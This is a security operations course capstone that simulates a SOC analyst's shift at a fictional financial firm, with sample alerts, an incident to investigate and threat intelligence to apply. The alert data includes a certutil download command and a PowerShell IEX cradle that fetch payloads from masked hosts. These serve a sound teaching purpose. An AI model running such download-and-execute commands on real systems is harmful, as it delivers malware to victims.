Run a full SOC simulation before moving to reading resources.

Opening Framing: Putting It All Together

Over the past eleven weeks, you've built a comprehensive foundation in security operations. You've learned monitoring, detection, triage, incident response, threat intelligence, hunting, and automation. Now it's time to apply everything in a realistic scenario.

This capstone simulates a day in a Security Operations Center. You'll handle an alert queue, investigate incidents, make decisions under pressure, document your work, and produce deliverables that demonstrate professional competency.

The scenario is designed to test not just individual skills, but your ability to integrate them—triaging efficiently, investigating thoroughly, responding appropriately, and communicating clearly.

Key insight: Real SOC work requires integrating many skills simultaneously. This capstone demonstrates that integration.

Capstone Scenario: Acme Financial Services

You're a SOC analyst at Acme Financial Services, a mid-sized financial institution. It's Monday morning, and you're starting your shift.

Organization Profile:
- 2,500 employees
- Headquarters + 12 branch offices
- Customer-facing web applications
- Internal trading systems
- Regulated industry (financial services)

Security Stack:
- SIEM: Splunk Enterprise Security
- EDR: CrowdStrike Falcon
- Firewall: Palo Alto Networks
- Email: Microsoft 365 with Defender
- SOAR: Splunk SOAR

Your Role:
- Tier 1/2 SOC Analyst
- Shift: 8 AM - 4 PM
- Responsibilities: Alert triage, investigation, escalation

Current Situation:
- Weekend was quiet (automated systems only)
- Several alerts accumulated overnight
- One ongoing investigation from Friday (handed off)
- Threat intel report about financial sector targeting

Part 1: Shift Handoff Review

Review the handoff from the previous shift:

SHIFT HANDOFF - Sunday Night to Monday Morning
Analyst: Sarah Chen
Time: 2024-01-14 23:45 UTC

OPEN INCIDENTS:

INC-2024-0112: Suspicious PowerShell Activity
- Status: Under investigation
- Host: TRADE-WS-07 (Trading floor workstation)
- User: mrodriguez (Senior Trader)
- Summary: EDR detected encoded PowerShell execution
- Actions taken: 
  * Alert triaged, escalated to Tier 2
  * Memory dump collected
  * User notified, asked not to use system
- Next steps: Malware analysis of memory dump
- Priority: HIGH

ALERT QUEUE STATUS:
- 23 alerts pending triage
- Oldest alert: 6 hours
- Mix of EDR, firewall, and email alerts

ENVIRONMENTAL NOTES:
- Patch Tuesday updates rolling out this week
- Trading systems maintenance window: Tuesday 2-4 AM
- New threat intel: APT targeting financial sector (see TI-2024-0115)

ITEMS FOR INCOMING ANALYST:
1. Continue INC-2024-0112 investigation
2. Review TI-2024-0115 and check for related IOCs
3. Clear alert backlog - prioritize by severity

Your Task:

1. Review the handoff notes
2. Prioritize your work for the shift
3. Document your shift plan

Part 2: Alert Triage Queue

Your alert queue contains the following alerts. Triage each one.

Alert 1: Failed Login Attempts

ALERT: Multiple Failed Logins
Time: 2024-01-15 02:34 UTC
Source: Active Directory
Target: VPN Gateway
Account: svc_backup
Failures: 47 in 10 minutes
Source IPs: 185.220.101.XX (Tor exit node)
Status: Failures only, no success

Alert 2: Malware Detection

ALERT: Malware Detected - Blocked
Time: 2024-01-15 05:12 UTC  
Source: Email Gateway
Recipient: jthompson@acme-financial.com
Subject: "Invoice #INV-29481 - Urgent Payment Required"
Attachment: Invoice_29481.xlsm
Detection: Emotet dropper (macro-based)
Action: Blocked, quarantined

Alert 3: Unusual Data Transfer

ALERT: Large Outbound Data Transfer
Time: 2024-01-15 03:45 UTC
Source Host: FILESVR-02 (HR File Server)
Destination: 104.21.XX.XX (Cloudflare IP - file sharing service)
Size: 2.3 GB
Protocol: HTTPS
User Context: Unknown (service account)

Alert 4: Suspicious Process

ALERT: Suspicious Process Execution
Time: 2024-01-15 06:58 UTC
Host: ACCT-WS-22 (Accounting workstation)
User: dlee (Accounts Payable Clerk)
Process: certutil.exe -urlcache -f http://XX.XX.XX.XX/update.exe
Parent: outlook.exe
EDR Action: Blocked execution

Alert 5: Policy Violation

ALERT: Unauthorized Software Installation
Time: 2024-01-15 07:30 UTC
Host: MKT-WS-15 (Marketing workstation)
User: kpatel (Marketing Manager)
Software: TeamViewer (remote access tool)
Policy: Unauthorized remote access software

Your Task:

For each alert, document:

• Classification (TP, FP, BTP)
• Priority (P1-P5)
• Initial assessment
• Required actions

Part 3: Incident Investigation

Continue the investigation of INC-2024-0112 from the handoff:

INCIDENT: INC-2024-0112
Title: Suspicious PowerShell Activity - Trading Workstation

TIMELINE (from previous investigation):
- 2024-01-12 16:45: User mrodriguez received email with link
- 2024-01-12 16:47: User clicked link, downloaded document
- 2024-01-12 16:48: Document opened, macro executed
- 2024-01-12 16:48: PowerShell spawned with encoded command
- 2024-01-12 16:49: EDR detected and alerted
- 2024-01-12 16:52: Alert triaged, escalated

EVIDENCE COLLECTED:
- Memory dump from TRADE-WS-07
- Email with original link
- Downloaded document (quarantined)
- EDR telemetry export

DECODED POWERSHELL COMMAND:
IEX (New-Object Net.WebClient).DownloadString('http://185.XX.XX.XX/stage2.ps1')

ADDITIONAL FINDINGS (your investigation):
- stage2.ps1 performs system reconnaissance
- Attempts to query Active Directory
- Beacons to 185.XX.XX.XX:443 every 60 seconds
- No lateral movement detected (yet)
- User has access to trading applications and financial data

Your Task:

1. Complete the investigation timeline
2. Identify all IOCs
3. Map to MITRE ATT&CK techniques
4. Determine scope of compromise
5. Recommend containment actions
6. Write incident report

Part 4: Threat Intelligence Application

Review the new threat intelligence report:

THREAT INTELLIGENCE REPORT: TI-2024-0115
Title: FIN7 Campaign Targeting Financial Services
Classification: TLP:AMBER
Date: 2024-01-14

SUMMARY:
FIN7 threat group observed conducting active campaign against
financial services organizations in North America. Campaign
uses spearphishing with macro-enabled documents targeting
finance and trading departments.

TTPs OBSERVED:
- Initial Access: Spearphishing Attachment (T1566.001)
- Execution: PowerShell (T1059.001)
- Persistence: Scheduled Task (T1053.005)
- C2: Web Service (T1102)

IOCs:
IPs:
- 185.234.72.XX
- 91.219.236.XX
- 45.142.213.XX

Domains:
- secure-docs[.]finance
- invoice-portal[.]net
- payment-update[.]com

Hashes (SHA256):
- a1b2c3d4e5f6... (dropper)
- f6e5d4c3b2a1... (stage2)

RECOMMENDATIONS:
- Block IOCs at perimeter
- Hunt for related activity
- Brief high-risk users
- Increase monitoring of finance/trading systems

Your Task:

1. Check if IOCs match INC-2024-0112
2. Hunt for IOCs across environment
3. Recommend detection rules
4. Draft user awareness communication

Part 5: Deliverables

Your capstone submission must include:

1. Shift Plan (10 points)

• Prioritized task list for the shift
• Rationale for prioritization
• Time allocation

2. Alert Triage Report (20 points)

• Classification for each of 5 alerts
• Priority assignment with justification
• Required actions for each
• Any correlations identified

3. Incident Investigation Report (30 points)

• Executive summary
• Complete timeline
• ATT&CK mapping
• IOC list
• Scope assessment
• Containment recommendations
• Lessons learned

4. Threat Intelligence Response (20 points)

• IOC comparison analysis
• Hunt queries used/recommended
• Detection rules (Sigma format preferred)
• User awareness draft

5. Shift Handoff Notes (10 points)

• Summary for next analyst
• Open items and status
• Recommendations

6. Reflection (10 points)

• What went well
• What was challenging
• What you would do differently
• How this connects to real SOC work

Evaluation Criteria

Your capstone will be evaluated on:

Total: 100 points. Projects scoring 80+ demonstrate job-ready competency.

Tips for Success

Time Management:
- Allocate time before starting
- Don't get stuck on one alert
- Leave time for documentation

Prioritization:
- High impact + high confidence = highest priority
- Consider business context
- Document your reasoning

Investigation:
- Follow the evidence
- Don't assume—verify
- Map to ATT&CK as you go

Documentation:
- Write as you work, not after
- Be specific and factual
- Include evidence for conclusions

Professionalism:
- Write for your audience
- Be clear and concise
- Proofread before submission

Week 12 Outcome Check

By completing this capstone, you will have demonstrated:

• Alert triage and prioritization skills
• Investigation methodology
• Incident documentation
• Threat intelligence application
• Communication skills (technical and executive)
• Professional judgment and decision-making

Congratulations! Completing this capstone demonstrates you have the skills expected of an entry-level SOC analyst.

🛡️ Capstone Extension: Harden & Defend

Enterprise SOCs do more than investigate. They harden systems, deploy detection, and document baselines for future response.

• Apply CIS Level 1 hardening to one Windows and one Linux host
• Define a baseline of expected services and processes
• Plan SIEM + EDR coverage for critical systems
• Create a short runbook for baseline drift and alerts

Deliverable: Hardening checklist + monitoring plan + runbook summary.

🎯 Hands-On Labs (Free & Essential)

Run a full SOC simulation before moving to reading resources.

💡 Lab Tip: Treat documentation as part of the response, not an afterthought.

Resources

Reference these resources as you complete your capstone.

• MITRE ATT&CK Framework · Reference · 50 XP · Resource ID: csy201_w12_r1 (Required)
• Sigma Rules Repository · Reference · 25 XP · Resource ID: csy201_w12_r2 (Optional)
• SANS Security Posters (Investigation Reference) · Reference · 25 XP · Resource ID: csy201_w12_r3 (Optional)

Week 12 Quiz

Test your understanding of SOC workflow integration and capstone decision-making.

Format: 10 multiple-choice questions. Passing score: 70%. Time: Untimed.

Final Reflection

Reflection Prompt (400-500 words):

This capstone represents the culmination of your security operations journey in CSY201. You've progressed from understanding SOC concepts to performing analyst work in a realistic scenario.

Reflect on these questions:

• Compare your understanding of SOC work now versus Week 1. What aspects are clearer? What remains challenging?
• Which skills from this course do you feel most confident in? Which areas need more development?
• How did the capstone scenario compare to your expectations of SOC work? What surprised you?
• What would you do differently if you could repeat the capstone?
• Where do you want to specialize in security operations? (Detection engineering, threat hunting, incident response, automation, etc.)

A strong final reflection will honestly assess your growth, identify areas for continued learning, and articulate your career direction.

What's Next?

Completing CSY201 opens doors to specialized security topics:

• CSY202 - Ethical Hacking: Penetration testing methodology and techniques
• CSY203 - Web Application Security: OWASP Top 10, web vulnerabilities, secure development
• CSY204 - Digital Forensics: Evidence collection, analysis, and investigation
• CSY205 - Cloud Security: Securing AWS, Azure, and GCP environments

Certifications to Consider:

• CompTIA CySA+ (Cybersecurity Analyst)
• GIAC GSOC (Security Operations Certified)
• Splunk Core Certified User
• Blue Team Level 1 (BTL1)

Congratulations on completing CSY201! You now have a solid foundation in security operations—one of the most in-demand areas of cybersecurity. SOC skills are immediately applicable and highly valued. The monitoring, detection, investigation, and response capabilities you've developed will serve you throughout your security career. Keep learning, keep practicing, and welcome to the blue team!